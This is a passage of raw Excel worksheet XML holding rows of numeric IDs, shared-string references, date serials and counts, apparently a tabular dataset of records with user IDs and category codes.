    <row r="246" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A246" s="9">
        <v>114229</v>
      </c>
      <c r="B246" s="9" t="s">
        <v>1056</v>
      </c>
      <c r="C246" s="9" t="s">
        <v>2422</v>
      </c>
      <c r="D246" s="9" t="s">
        <v>2423</v>
      </c>
      <c r="E246" s="9">
        <v>12534</v>
      </c>
      <c r="F246" s="9" t="s">
        <v>2424</v>
      </c>
      <c r="G246" s="10">
        <v>42381.390277777777</v>
      </c>
      <c r="H246" s="9">
        <v>4354201</v>
      </c>
      <c r="I246" s="9" t="s">
        <v>2425</v>
      </c>
      <c r="J246" s="10">
        <v>42381.385416666664</v>
      </c>
      <c r="K246" s="9" t="s">
        <v>1057</v>
      </c>
      <c r="L246" s="7">
        <v>3</v>
      </c>
      <c r="M246" s="7">
        <v>1</v>
      </c>
      <c r="N246" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="247" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A247" s="9">
        <v>114543</v>
      </c>
      <c r="B247" s="9" t="s">
        <v>1058</v>
      </c>
      <c r="C247" s="9" t="s">
        <v>2426</v>
      </c>
      <c r="D247" s="9" t="s">
        <v>2427</v>
      </c>
      <c r="E247" s="9">
        <v>3863893</v>
      </c>
      <c r="F247" s="9" t="s">
        <v>2428</v>
      </c>
      <c r="G247" s="10">
        <v>42444.481249999997</v>
      </c>
      <c r="H247" s="9">
        <v>863110</v>
      </c>
      <c r="I247" s="9" t="s">
        <v>2429</v>
      </c>
      <c r="J247" s="10">
        <v>42432.620138888888</v>
      </c>
      <c r="K247" s="9" t="s">
        <v>1059</v>
      </c>
      <c r="L247" s="7">
        <v>16</v>
      </c>
      <c r="M247" s="7">
        <v>11</v>
      </c>
      <c r="N247" s="9" t="s">
        <v>699</v>
      </c>
      <c r="O247" s="9" t="s">
        <v>704</v>
      </c>
      <c r="P247" s="9" t="s">
        <v>701</v>
      </c>
    </row>
    <row r="248" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A248" s="9">
        <v>114735</v>
      </c>
      <c r="B248" s="9" t="s">
        <v>1060</v>
      </c>
      <c r="C248" s="9" t="s">
        <v>2430</v>
      </c>
      <c r="D248" s="9" t="s">
        <v>2431</v>
      </c>
      <c r="E248" s="9">
        <v>6216</v>
      </c>
      <c r="F248" s="9" t="s">
        <v>2432</v>
      </c>
      <c r="G248" s="10">
        <v>39713.575694444444</v>
      </c>
      <c r="H248" s="9">
        <v>6216</v>
      </c>
      <c r="I248" s="9" t="s">
        <v>2432</v>
      </c>
      <c r="J248" s="10">
        <v>39713.543749999997</v>
      </c>
      <c r="K248" s="9" t="s">
        <v>1061</v>
      </c>
      <c r="L248" s="7">
        <v>2</v>
      </c>
      <c r="M248" s="7">
        <v>1</v>
      </c>
      <c r="Q248" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="249" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A249" s="9">
        <v>116690</v>
      </c>
      <c r="B249" s="9" t="s">
        <v>1062</v>
      </c>
      <c r="C249" s="9" t="s">
        <v>2433</v>
      </c>
      <c r="D249" s="9" t="s">
        <v>2434</v>
      </c>
      <c r="E249" s="9">
        <v>2074608</v>
      </c>
      <c r="F249" s="9" t="s">
        <v>2435</v>
      </c>
      <c r="G249" s="10">
        <v>41679.168749999997</v>
      </c>
      <c r="H249" s="9">
        <v>1412</v>
      </c>
      <c r="I249" s="9" t="s">
        <v>2436</v>
      </c>
      <c r="J249" s="10">
        <v>39721.699999999997</v>
      </c>
      <c r="K249" s="9" t="s">
        <v>1063</v>
      </c>
      <c r="L249" s="7">
        <v>5</v>
      </c>
      <c r="M249" s="7">
        <v>3</v>
      </c>
      <c r="Q249" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="250" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A250" s="9">
        <v>120693</v>
      </c>
      <c r="B250" s="9" t="s">
        <v>1064</v>
      </c>
      <c r="C250" s="9" t="s">
        <v>2437</v>
      </c>
      <c r="D250" s="9" t="s">
        <v>2438</v>
      </c>
      <c r="E250" s="9">
        <v>1384652</v>
      </c>
      <c r="F250" s="9" t="s">
        <v>2439</v>
      </c>
      <c r="G250" s="10">
        <v>39714.527083333334</v>
      </c>
      <c r="H250" s="9">
        <v>1384652</v>
      </c>
      <c r="I250" s="9" t="s">
        <v>2439</v>
      </c>
      <c r="J250" s="10">
        <v>39714.523611111108</v>
      </c>
      <c r="K250" s="9" t="s">
        <v>1065</v>
      </c>
      <c r="L250" s="7">
        <v>2</v>
      </c>
      <c r="M250" s="7">
        <v>1</v>
      </c>
      <c r="Q250" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="251" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A251" s="9">
        <v>121724</v>
      </c>
      <c r="B251" s="9" t="s">
        <v>1066</v>
      </c>
      <c r="C251" s="9" t="s">
        <v>2440</v>
      </c>
      <c r="D251" s="9" t="s">
        <v>2441</v>
      </c>
      <c r="E251" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="F251" s="9" t="s">
        <v>2442</v>
      </c>
      <c r="G251" s="10">
        <v>40403.645833333336</v>
      </c>
      <c r="H251" s="9">
        <v>75500</v>
      </c>
      <c r="I251" s="9" t="s">
        <v>2443</v>
      </c>
      <c r="J251" s="10">
        <v>40280.217361111114</v>
      </c>
      <c r="K251" s="9" t="s">
        <v>1067</v>
      </c>
      <c r="L251" s="7">
        <v>6</v>
      </c>
      <c r="M251" s="7">
        <v>4</v>
      </c>
      <c r="N251" s="9" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="252" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A252" s="9">
        <v>121945</v>
      </c>
      <c r="B252" s="9" t="s">
        <v>1068</v>
      </c>
      <c r="C252" s="9" t="s">
        <v>2444</v>
      </c>
      <c r="D252" s="9" t="s">
        <v>2445</v>
      </c>
      <c r="E252" s="9">
        <v>3208</v>
      </c>
      <c r="F252" s="9" t="s">
        <v>2446</v>
      </c>
      <c r="G252" s="10">
        <v>39715.73541666667</v>
      </c>
      <c r="H252" s="9">
        <v>1662</v>
      </c>
      <c r="I252" s="9" t="s">
        <v>2447</v>
      </c>
      <c r="J252" s="10">
        <v>39714.741666666669</v>
      </c>
      <c r="K252" s="9" t="s">
        <v>1069</v>
      </c>
      <c r="L252" s="7">
        <v>7</v>
      </c>
      <c r="M252" s="7">
        <v>1</v>
      </c>
      <c r="N252" s="9" t="s">
        <v>697</v>
      </c>
    </row>
    <row r="253" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A253" s="9">
        <v>122102</v>
      </c>
      <c r="B253" s="9" t="s">
        <v>1070</v>
      </c>
      <c r="C253" s="9" t="s">
        <v>2448</v>
      </c>
      <c r="D253" s="9" t="s">
        <v>2449</v>
      </c>
      <c r="E253" s="9">
        <v>426671</v>
      </c>
      <c r="F253" s="9" t="s">
        <v>2101</v>
      </c>
      <c r="G253" s="10">
        <v>42816.678472222222</v>
      </c>
      <c r="H253" s="9">
        <v>7275984</v>
      </c>
      <c r="I253" s="9" t="s">
        <v>2102</v>
      </c>
      <c r="J253" s="10">
        <v>42815.841666666667</v>
      </c>
      <c r="K253" s="9" t="s">
        <v>1071</v>
      </c>
      <c r="L253" s="7">
        <v>24</v>
      </c>
      <c r="M253" s="7">
        <v>22</v>
      </c>
      <c r="N253" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="254" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A254" s="9">
        <v>122544</v>
      </c>
      <c r="B254" s="9" t="s">
        <v>1072</v>
      </c>
      <c r="C254" s="9" t="s">
        <v>2450</v>
      </c>
      <c r="D254" s="9" t="s">
        <v>2451</v>
      </c>
      <c r="E254" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="F254" s="9" t="s">
        <v>2442</v>
      </c>
      <c r="G254" s="10">
        <v>39716.55972222222</v>
      </c>
      <c r="H254" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="I254" s="9" t="s">
        <v>2442</v>
      </c>
      <c r="J254" s="10">
        <v>39716.558333333334</v>
      </c>
      <c r="K254" s="9" t="s">
        <v>1073</v>
      </c>
      <c r="L254" s="7">
        <v>3</v>
      </c>
      <c r="M254" s="7">
        <v>1</v>
      </c>
      <c r="Q254" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="255" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A255" s="9">
        <v>123559</v>
      </c>
      <c r="B255" s="9" t="s">
        <v>1074</v>
      </c>
      <c r="C255" s="9" t="s">
        <v>2452</v>
      </c>
      <c r="D255" s="9" t="s">
        <v>2453</v>
      </c>
      <c r="E255" s="9">
        <v>426671</v>
      </c>
      <c r="F255" s="9" t="s">
        <v>2101</v>
      </c>
      <c r="G255" s="10">
        <v>42816.679166666669</v>
      </c>
      <c r="H255" s="9">
        <v>7275984</v>
      </c>
      <c r="I255" s="9" t="s">
        <v>2102</v>
      </c>
      <c r="J255" s="10">
        <v>42815.843055555553</v>
      </c>
      <c r="K255" s="9" t="s">
        <v>1075</v>
      </c>
      <c r="L255" s="7">
        <v>6</v>
      </c>
      <c r="M255" s="7">
        <v>4</v>
      </c>
      <c r="N255" s="9" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="256" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A256" s="9">
        <v>123817</v>
      </c>
      <c r="B256" s="9" t="s">
        <v>1076</v>
      </c>
      <c r="C256" s="9" t="s">
        <v>2454</v>
      </c>
      <c r="D256" s="9" t="s">
        <v>2455</v>
      </c>
      <c r="E256" s="9">
        <v>5074</v>
      </c>
      <c r="F256" s="9" t="s">
        <v>2456</v>
      </c>
      <c r="G256" s="10">
        <v>39843.581250000003</v>
      </c>
      <c r="H256" s="9">
        <v>5074</v>
      </c>
      <c r="I256" s="9" t="s">
        <v>2456</v>
      </c>
      <c r="J256" s="10">
        <v>39843.580555555556</v>
      </c>
      <c r="K256" s="9" t="s">
        <v>1077</v>
      </c>
      <c r="L256" s="7">
        <v>5</v>
      </c>
      <c r="M256" s="7">
        <v>3</v>
      </c>
      <c r="N256" s="9" t="s">
        <v>705</v>
      </c>
      <c r="O256" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="257" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A257" s="9">
        <v>124959</v>
      </c>
      <c r="B257" s="9" t="s">
        <v>1078</v>
      </c>
      <c r="C257" s="9" t="s">
        <v>2457</v>
      </c>
      <c r="D257" s="9" t="s">
        <v>2458</v>
      </c>
      <c r="E257" s="9">
        <v>4284627</v>
      </c>
      <c r="F257" s="9" t="s">
        <v>2459</v>
      </c>
      <c r="G257" s="10">
        <v>43314.992361111108</v>
      </c>
      <c r="H257" s="9">
        <v>4248328</v>
      </c>
      <c r="I257" s="9" t="s">
        <v>2460</v>
      </c>
      <c r="J257" s="10">
        <v>42160.914583333331</v>
      </c>
      <c r="K257" s="9" t="s">
        <v>1079</v>
      </c>
      <c r="L257" s="7">
        <v>6</v>
      </c>
      <c r="M257" s="7">
        <v>4</v>
      </c>
      <c r="N257" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="258" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A258" s="9">
        <v>125022</v>
      </c>
      <c r="B258" s="9" t="s">
        <v>1080</v>
      </c>
      <c r="C258" s="9" t="s">
        <v>2461</v>
      </c>
      <c r="D258" s="9" t="s">
        <v>2462</v>
      </c>
      <c r="E258" s="9">
        <v>14728</v>
      </c>
      <c r="F258" s="9" t="s">
        <v>2463</v>
      </c>
      <c r="G258" s="10">
        <v>42184.622916666667</v>
      </c>
      <c r="H258" s="9">
        <v>4248328</v>
      </c>
      <c r="I258" s="9" t="s">
        <v>2460</v>
      </c>
      <c r="J258" s="10">
        <v>42160.913888888892</v>
      </c>
      <c r="K258" s="9" t="s">
        <v>1081</v>
      </c>
      <c r="L258" s="7">
        <v>3</v>
      </c>
      <c r="M258" s="7">
        <v>1</v>
      </c>
      <c r="N258" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="259" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A259" s="9">
        <v>125523</v>
      </c>
      <c r="B259" s="9" t="s">
        <v>1082</v>
      </c>
      <c r="C259" s="9" t="s">
        <v>2464</v>
      </c>
      <c r="D259" s="9" t="s">
        <v>2465</v>
      </c>
      <c r="E259" s="9">
        <v>1227001</v>
      </c>
      <c r="F259" s="9" t="s">
        <v>2466</v>
      </c>
      <c r="G259" s="10">
        <v>39715.663194444445</v>
      </c>
      <c r="H259" s="9">
        <v>1227001</v>
      </c>
      <c r="I259" s="9" t="s">
        <v>2466</v>
      </c>
      <c r="J259" s="10">
        <v>39715.272222222222</v>
      </c>
      <c r="K259" s="9" t="s">
        <v>1083</v>
      </c>
      <c r="L259" s="7">
        <v>4</v>
      </c>
      <c r="M259" s="7">
        <v>3</v>
      </c>
      <c r="N259" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="260" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A260" s="9">
        <v>125627</v>
      </c>
      <c r="B260" s="9" t="s">
        <v>1084</v>
      </c>
      <c r="C260" s="9" t="s">
        <v>2467</v>
      </c>
      <c r="D260" s="9" t="s">
        <v>2468</v>
      </c>
      <c r="E260" s="9">
        <v>1220</v>
      </c>
      <c r="F260" s="9" t="s">
        <v>1936</v>
      </c>
      <c r="G260" s="10">
        <v>39715.259027777778</v>
      </c>
      <c r="H260" s="9">
        <v>1659</v>
      </c>
      <c r="I260" s="9" t="s">
        <v>1825</v>
      </c>
      <c r="J260" s="10">
        <v>39715.255555555559</v>
      </c>
      <c r="K260" s="9" t="s">
        <v>1085</v>
      </c>
      <c r="L260" s="7">
        <v>4</v>
      </c>
      <c r="M260" s="7">
        <v>2</v>
      </c>
      <c r="N260" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="261" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A261" s="9">
        <v>126855</v>
      </c>
      <c r="B261" s="9" t="s">
        <v>1086</v>
      </c>
      <c r="C261" s="9" t="s">
        <v>2469</v>
      </c>
      <c r="D261" s="9" t="s">
        <v>2470</v>
      </c>
      <c r="E261" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="F261" s="9" t="s">
        <v>2471</v>
      </c>
      <c r="G261" s="10">
        <v>39715.525694444441</v>
      </c>
      <c r="H261" s="9">
        <v>14860</v>
      </c>
      <c r="I261" s="9" t="s">
        <v>1627</v>
      </c>
      <c r="J261" s="10">
        <v>39715.525000000001</v>
      </c>
      <c r="K261" s="9" t="s">
        <v>1087</v>
      </c>
      <c r="L261" s="7">
        <v>3</v>
      </c>
      <c r="M261" s="7">
        <v>1</v>
      </c>
      <c r="N261" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="262" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A262" s="9">
        <v>127318</v>
      </c>
      <c r="B262" s="9" t="s">
        <v>1088</v>
      </c>
      <c r="C262" s="9" t="s">
        <v>2472</v>
      </c>
      <c r="D262" s="9" t="s">
        <v>2473</v>
      </c>
      <c r="E262" s="9">
        <v>2361</v>
      </c>
      <c r="F262" s="9" t="s">
        <v>2474</v>
      </c>
      <c r="G262" s="10">
        <v>39959.731944444444</v>
      </c>
      <c r="H262" s="9">
        <v>2361</v>
      </c>
      <c r="I262" s="9" t="s">
        <v>2474</v>
      </c>
      <c r="J262" s="10">
        <v>39959.730555555558</v>
      </c>
      <c r="K262" s="9" t="s">
        <v>1089</v>
      </c>
      <c r="L262" s="7">
        <v>5</v>
      </c>
      <c r="M262" s="7">
        <v>3</v>
      </c>
      <c r="Q262" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="263" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A263" s="9">
        <v>127869</v>
      </c>
      <c r="B263" s="9" t="s">
        <v>1090</v>
      </c>
      <c r="C263" s="9" t="s">
        <v>2475</v>
      </c>
      <c r="D263" s="9" t="s">
        <v>2476</v>
      </c>
      <c r="E263" s="9">
        <v>6088</v>
      </c>
      <c r="F263" s="9" t="s">
        <v>2477</v>
      </c>
      <c r="G263" s="10">
        <v>40127.936805555553</v>
      </c>
      <c r="H263" s="9">
        <v>76337</v>
      </c>
      <c r="I263" s="9" t="s">
        <v>2478</v>
      </c>
      <c r="J263" s="10">
        <v>40038.445833333331</v>
      </c>
      <c r="K263" s="9" t="s">
        <v>1091</v>
      </c>
      <c r="L263" s="7">
        <v>3</v>
      </c>
      <c r="M263" s="7">
        <v>1</v>
      </c>
      <c r="N263" s="9" t="s">
        <v>705</v>
      </c>
      <c r="O263" s="9" t="s">
        <v>699</v>
      </c>
      <c r="Q263" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="264" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A264" s="9">
        <v>128279</v>
      </c>
      <c r="B264" s="9" t="s">
        <v>1092</v>
      </c>
      <c r="C264" s="9" t="s">
        <v>2479</v>
      </c>
      <c r="D264" s="9" t="s">
        <v>2480</v>
      </c>
      <c r="E264" s="9">
        <v>707111</v>
      </c>
      <c r="F264" s="9" t="s">
        <v>2481</v>
      </c>
      <c r="G264" s="10">
        <v>41339.118055555555</v>
      </c>
      <c r="H264" s="9">
        <v>360932</v>
      </c>
      <c r="I264" s="9" t="s">
        <v>2482</v>
      </c>
      <c r="J264" s="10">
        <v>41339.118055555555</v>
      </c>
      <c r="K264" s="9" t="s">
        <v>1093</v>
      </c>
      <c r="L264" s="7">
        <v>5</v>
      </c>
      <c r="M264" s="7">
        <v>3</v>
      </c>
      <c r="N264" s="9" t="s">
        <v>701</v>
      </c>
    </row>
    <row r="265" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A265" s="3">
        <v>135454</v>
      </c>
      <c r="B265" s="3" t="s">
        <v>3</v>
      </c>
      <c r="C265" s="9" t="s">
        <v>2483</v>
      </c>
      <c r="D265" s="9" t="s">
        <v>2484</v>
      </c>
      <c r="E265" s="9">
        <v>1737</v>
      </c>
      <c r="F265" s="9" t="s">
        <v>2485</v>
      </c>
      <c r="G265" s="10">
        <v>41467.367361111108</v>
      </c>
      <c r="H265" s="9">
        <v>1737</v>
      </c>
      <c r="I265" s="9" t="s">
        <v>2485</v>
      </c>
      <c r="J265" s="10">
        <v>41436.338888888888</v>
      </c>
      <c r="K265" s="3" t="s">
        <v>4</v>
      </c>
      <c r="L265" s="4">
        <v>4</v>
      </c>
      <c r="M265" s="4">
        <v>2</v>
      </c>
      <c r="N265" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O265" s="3" t="s">
        <v>699</v>
      </c>
      <c r="P265" s="3"/>
      <c r="Q265" s="3"/>
    </row>
    <row r="266" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A266" s="3">
        <v>136092</v>
      </c>
      <c r="B266" s="3" t="s">
        <v>5</v>
      </c>
      <c r="C266" s="9" t="s">
        <v>2486</v>
      </c>
      <c r="D266" s="9" t="s">
        <v>2487</v>
      </c>
      <c r="E266" s="9">
        <v>1324810</v>
      </c>
      <c r="F266" s="9" t="s">
        <v>2488</v>
      </c>
      <c r="G266" s="10">
        <v>42700.078472222223</v>
      </c>
      <c r="H266" s="9">
        <v>1336654</v>
      </c>
      <c r="I266" s="9" t="s">
        <v>2489</v>
      </c>
      <c r="J266" s="10">
        <v>42289.606944444444</v>
      </c>
      <c r="K266" s="3" t="s">
        <v>6</v>
      </c>
      <c r="L266" s="4">
        <v>5</v>
      </c>
      <c r="M266" s="4">
        <v>3</v>
      </c>
      <c r="N266" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O266" s="3" t="s">
        <v>700</v>
      </c>
      <c r="P266" s="3"/>
      <c r="Q266" s="3"/>
    </row>
    <row r="267" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A267" s="3">
        <v>136625</v>
      </c>
      <c r="B267" s="3" t="s">
        <v>7</v>
      </c>
      <c r="C267" s="9" t="s">
        <v>2490</v>
      </c>
      <c r="D267" s="9" t="s">
        <v>2491</v>
      </c>
      <c r="E267" s="9">
        <v>5640</v>
      </c>
      <c r="F267" s="9" t="s">
        <v>1706</v>
      </c>
      <c r="G267" s="10">
        <v>40742.675694444442</v>
      </c>
      <c r="H267" s="9">
        <v>28843</v>
      </c>
      <c r="I267" s="9" t="s">
        <v>2492</v>
      </c>
      <c r="J267" s="10">
        <v>40742.367361111108</v>
      </c>
      <c r="K267" s="3" t="s">
        <v>8</v>
      </c>
      <c r="L267" s="4">
        <v>4</v>
      </c>
      <c r="M267" s="4">
        <v>2</v>
      </c>
      <c r="N267" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O267" s="3"/>
      <c r="P267" s="3"/>
      <c r="Q267" s="3"/>
    </row>
    <row r="268" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A268" s="3">
        <v>136730</v>
      </c>
      <c r="B268" s="3" t="s">
        <v>9</v>
      </c>
      <c r="C268" s="9" t="s">
        <v>2493</v>
      </c>
      <c r="D268" s="9" t="s">
        <v>2494</v>
      </c>
      <c r="E268" s="9">
        <v>4774918</v>
      </c>
      <c r="F268" s="9" t="s">
        <v>2495</v>
      </c>
      <c r="G268" s="10">
        <v>43067.499305555553</v>
      </c>
      <c r="H268" s="9">
        <v>3798217</v>
      </c>
      <c r="I268" s="9" t="s">
        <v>2496</v>
      </c>
      <c r="J268" s="10">
        <v>43067.427777777775</v>
      </c>
      <c r="K268" s="3" t="s">
        <v>10</v>
      </c>
      <c r="L268" s="4">
        <v>4</v>
      </c>
      <c r="M268" s="4">
        <v>2</v>
      </c>
      <c r="N268" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O268" s="3" t="s">
        <v>699</v>
      </c>
      <c r="P268" s="3"/>
      <c r="Q268" s="3"/>
    </row>
    <row r="269" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A269" s="3">
        <v>136872</v>
      </c>
      <c r="B269" s="3" t="s">
        <v>11</v>
      </c>
      <c r="C269" s="9" t="s">
        <v>2497</v>
      </c>
      <c r="D269" s="9" t="s">
        <v>2498</v>
      </c>
      <c r="E269" s="9">
        <v>427309</v>
      </c>
      <c r="F269" s="9" t="s">
        <v>2499</v>
      </c>
      <c r="G269" s="10">
        <v>41418.868055555555</v>
      </c>
      <c r="H269" s="9">
        <v>239879</v>
      </c>
      <c r="I269" s="9" t="s">
        <v>2500</v>
      </c>
      <c r="J269" s="10">
        <v>41393.63958333333</v>
      </c>
      <c r="K269" s="3" t="s">
        <v>12</v>
      </c>
      <c r="L269" s="4">
        <v>3</v>
      </c>
      <c r="M269" s="4">
        <v>1</v>
      </c>
      <c r="N269" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O269" s="3"/>
      <c r="P269" s="3"/>
      <c r="Q269" s="3"/>
    </row>
    <row r="270" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A270" s="9">
        <v>136946</v>
      </c>
      <c r="B270" s="9" t="s">
        <v>1094</v>
      </c>
      <c r="C270" s="9" t="s">
        <v>2501</v>
      </c>
      <c r="D270" s="9" t="s">
        <v>2502</v>
      </c>
      <c r="E270" s="9">
        <v>21539</v>
      </c>
      <c r="F270" s="9" t="s">
        <v>1991</v>
      </c>
      <c r="G270" s="10">
        <v>40745.765277777777</v>
      </c>
      <c r="H270" s="9">
        <v>1288</v>
      </c>
      <c r="I270" s="9" t="s">
        <v>794</v>
      </c>
      <c r="J270" s="10">
        <v>40343.525000000001</v>
      </c>
      <c r="K270" s="9" t="s">
        <v>1095</v>
      </c>
      <c r="L270" s="7">
        <v>4</v>
      </c>
      <c r="M270" s="7">
        <v>2</v>
      </c>
      <c r="N270" s="9" t="s">
        <v>700</v>
      </c>
      <c r="O270" s="9" t="s">
        <v>698</v>
      </c>
      <c r="Q270" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="271" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A271" s="3">
        <v>137406</v>
      </c>
      <c r="B271" s="3" t="s">
        <v>55</v>
      </c>
      <c r="C271" s="9" t="s">
        <v>2503</v>
      </c>
      <c r="D271" s="9" t="s">
        <v>2504</v>
      </c>
      <c r="E271" s="9">
        <v>685467</v>
      </c>
      <c r="F271" s="9" t="s">
        <v>2505</v>
      </c>
      <c r="G271" s="10">
        <v>42013.746527777781</v>
      </c>
      <c r="H271" s="9">
        <v>685467</v>
      </c>
      <c r="I271" s="9" t="s">
        <v>2505</v>
      </c>
      <c r="J271" s="10">
        <v>42013.743750000001</v>
      </c>
      <c r="K271" s="3" t="s">
        <v>56</v>
      </c>
      <c r="L271" s="4">
        <v>10</v>
      </c>
      <c r="M271" s="4">
        <v>5</v>
      </c>
      <c r="N271" s="3" t="s">
        <v>705</v>
      </c>
      <c r="O271" s="3"/>
      <c r="P271" s="3"/>
      <c r="Q271" s="3"/>
    </row>
    <row r="272" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A272" s="9">
        <v>137647</v>
      </c>
      <c r="B272" s="9" t="s">
        <v>1096</v>
      </c>
      <c r="C272" s="9" t="s">
        <v>2506</v>
      </c>
      <c r="D272" s="9" t="s">
        <v>2507</v>
      </c>
      <c r="E272" s="9">
        <v>2849</v>
      </c>
      <c r="F272" s="9" t="s">
        <v>2436</v>
      </c>
      <c r="G272" s="10">
        <v>39764.84097222222</v>
      </c>
      <c r="H272" s="9">
        <v>1666</v>
      </c>
      <c r="I272" s="9" t="s">
        <v>2508</v>
      </c>
      <c r="J272" s="10">
        <v>39717.183333333334</v>
      </c>
      <c r="K272" s="9" t="s">
        <v>1097</v>
      </c>
      <c r="L272" s="7">
        <v>4</v>
      </c>
      <c r="M272" s="7">
        <v>1</v>
      </c>
      <c r="Q272" s="9" t="s">
        <v>1047</v>
      </c>
    </row>
    <row r="273" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A273" s="3">
        <v>137734</v>
      </c>
      <c r="B273" s="3" t="s">
        <v>57</v>
      </c>
      <c r="C273" s="9" t="s">
        <v>2509</v>
      </c>
      <c r="D273" s="9" t="s">
        <v>2510</v>
      </c>
      <c r="E273" s="9">
        <v>275</v>
      </c>
      <c r="F273" s="9" t="s">
        <v>2511</v>
      </c>
      <c r="G273" s="10">
        <v>39717.23333333333</v>
      </c>
      <c r="H273" s="9">
        <v>275</v>
      </c>
      <c r="I273" s="9" t="s">
        <v>2511</v>
      </c>
      <c r="J273" s="10">
        <v>39717.182638888888</v>
      </c>
      <c r="K273" s="3" t="s">
        <v>58</v>
      </c>
      <c r="L273" s="4">
        <v>4</v>
      </c>
      <c r="M273" s="4">
        <v>3</v>
      </c>
      <c r="N273" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O273" s="3" t="s">
        <v>704</v>
      </c>
      <c r="P273" s="3"/>
      <c r="Q273" s="3"/>
    </row>
    <row r="274" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A274" s="9">
        <v>137975</v>
      </c>
      <c r="B274" s="9" t="s">
        <v>1098</v>
      </c>
      <c r="C274" s="9" t="s">
        <v>2512</v>
      </c>
      <c r="D274" s="9" t="s">
        <v>2513</v>
      </c>
      <c r="E274" s="9">
        <v>426671</v>
      </c>
      <c r="F274" s="9" t="s">
        <v>2101</v>
      </c>
      <c r="G274" s="10">
        <v>42816.679861111108</v>
      </c>
      <c r="H274" s="9">
        <v>7275984</v>
      </c>
      <c r="I274" s="9" t="s">
        <v>2102</v>
      </c>
      <c r="J274" s="10">
        <v>42815.844444444447</v>
      </c>
      <c r="K274" s="9" t="s">
        <v>1099</v>
      </c>
      <c r="L274" s="7">
        <v>8</v>
      </c>
      <c r="M274" s="7">
        <v>6</v>
      </c>
      <c r="N274" s="9" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="275" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A275" s="9">
        <v>138771</v>
      </c>
      <c r="B275" s="9" t="s">
        <v>1100</v>
      </c>
      <c r="C275" s="9" t="s">
        <v>2514</v>
      </c>
      <c r="D275" s="9" t="s">
        <v>2515</v>
      </c>
      <c r="E275" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="F275" s="9" t="s">
        <v>2516</v>
      </c>
      <c r="G275" s="10">
        <v>39903.363194444442</v>
      </c>
      <c r="H275" s="9">
        <v>655</v>
      </c>
      <c r="I275" s="9" t="s">
        <v>2517</v>
      </c>
      <c r="J275" s="10">
        <v>39754.597222222219</v>
      </c>
      <c r="K275" s="9" t="s">
        <v>1101</v>
      </c>
      <c r="L275" s="7">
        <v>3</v>
      </c>
      <c r="M275" s="7">
        <v>1</v>
      </c>
      <c r="N275" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="276" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A276" s="3">
        <v>139096</v>
      </c>
      <c r="B276" s="3" t="s">
        <v>59</v>
      </c>
      <c r="C276" s="9" t="s">
        <v>2518</v>
      </c>
      <c r="D276" s="9" t="s">
        <v>2519</v>
      </c>
      <c r="E276" s="9">
        <v>241986</v>
      </c>
      <c r="F276" s="9" t="s">
        <v>2520</v>
      </c>
      <c r="G276" s="10">
        <v>42460.662499999999</v>
      </c>
      <c r="H276" s="9">
        <v>254477</v>
      </c>
      <c r="I276" s="9" t="s">
        <v>2521</v>
      </c>
      <c r="J276" s="10">
        <v>42459.760416666664</v>
      </c>
